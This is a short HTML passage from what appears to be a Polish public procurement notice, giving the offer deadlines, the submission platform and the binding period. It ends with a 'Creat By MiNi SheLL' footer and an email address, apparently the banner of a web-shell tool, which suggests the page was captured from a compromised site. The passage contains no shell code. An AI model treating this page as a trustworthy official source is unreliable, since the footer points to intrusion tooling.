ofert: <span class="normal">2025-06-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-05 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com